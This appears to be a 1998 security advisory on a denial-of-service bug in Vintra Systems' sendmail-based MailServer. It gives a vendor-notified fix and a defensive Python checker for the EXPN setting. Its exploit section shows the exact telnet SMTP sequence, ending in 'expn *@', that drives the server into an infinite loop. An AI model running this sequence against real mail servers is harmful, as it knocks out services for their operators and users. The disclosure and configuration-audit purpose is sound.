From: Vytis Fedaravicius
Subject: DOS in Vintra systems Mailserver software.

Hello,

There is a bug in a free MailServer software for Windows NT from Vintra systems ( http://www.vintra.com/mailsrvr.html ). Any remote user can cause MTA to go nuts and make CPU usage up to 99%, eat all available memory and disk space.

Bug: one opens telnet to 25 port, issues helo, mail from: and rcpt to: commands, and instead of data command uses expn *@. Software goes in an infinite loop.

Fix: disable expn command by editing sendmail.cf. Add the following line and restart mta service.

O PrivacyOptions=needmailhelo, noexpn

Exploit (commands to enter are marked ">")

>telnet vulnerable.server.dom 25
220 vulnerable.server.dom ESMTP Sendmail 8.8.8/8.8.7; Mon, 20 Jul 1998 20:18:20 +0200 (Central Europe Daylight Time)
>helo EvilOne
250 vulnerable.server.dom Hello Administrators@localhost, pleased to meet you
>mail from:bad.boy
250 bad.boy... Sender ok
>rcpt to:resourceLeaker
550 resourceLeaker... User unknown
>expn *@
550 *@... User unknown
550 bad.boy... User unknown
550 bad.boy... User unknown
...hundreds of these lines get logged and memory is allocated, cpu usage increases wildly
550 bad.boy... User unknown
550 bad.boy... User unknown
....

This software is sendmail based, so maybe other implementations are vulnerable also?

Vintra systems were notified.

Vytis Fedaravicius
System administrator
Omnitel
e-mail: vytis@ot.lt
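
A configuration check for the fix described in the message, added here as an example and not part of the original post: it parses sendmail.cf text and reports whether PrivacyOptions disables EXPN. The function names and sample configurations are constructed for illustration; accepting the single-letter `Op` form, treating `goaway` as including `noexpn`, and unioning flags across lines are assumptions about stock sendmail behaviour.

```python
import re
import sys

# Flags that make sendmail refuse EXPN; "goaway" is assumed to include noexpn.
EXPN_BLOCKERS = {"noexpn", "goaway"}

def privacy_flags(cf_text):
    """Collect PrivacyOptions flags from sendmail.cf text (assumption: lines are unioned)."""
    flags = set()
    for line in cf_text.splitlines():
        if not line.startswith("O"):
            continue  # comments (#), blank lines and other cf commands
        body = line[1:]
        if body[:1] in (" ", "\t"):  # long form: O PrivacyOptions=...
            name, sep, value = body.partition("=")
            if not sep or name.strip().lower() != "privacyoptions":
                continue
        elif body.startswith("p"):  # single-letter form: Op...
            value = body[1:]
        else:
            continue  # some other option, e.g. OP
        flags.update(f.lower() for f in re.split(r"[,\s]+", value) if f)
    return flags

def audit(cf_text):
    """Report the flags found and whether the configuration disables EXPN."""
    flags = privacy_flags(cf_text)
    return {"flags": sorted(flags), "expn_disabled": bool(flags & EXPN_BLOCKERS)}

# Constructed sample configurations (not taken from a real server).
WEAK_CF = "# O PrivacyOptions=noexpn\nO PrivacyOptions=authwarnings\nOPPostmaster\n"
FIXED_CF = "O PrivacyOptions=needmailhelo, noexpn\n"  # the line from the advisory
SHORT_CF = "Opgoaway\n"

if __name__ == "__main__":
    if len(sys.argv) > 1:  # audit a real file: python check.py /path/to/sendmail.cf
        with open(sys.argv[1], encoding="latin-1") as fh:
            samples = {sys.argv[1]: fh.read()}
    else:
        samples = {"weak": WEAK_CF, "fixed": FIXED_CF, "short": SHORT_CF}
    for name, text in samples.items():
        result = audit(text)
        state = "disabled" if result["expn_disabled"] else "ENABLED"
        print(f"{name}: EXPN {state}; PrivacyOptions={result['flags']}")
```

A commented-out `noexpn` line, as in the weak sample, does not count as a fix, which is the case most likely to be missed in a manual review.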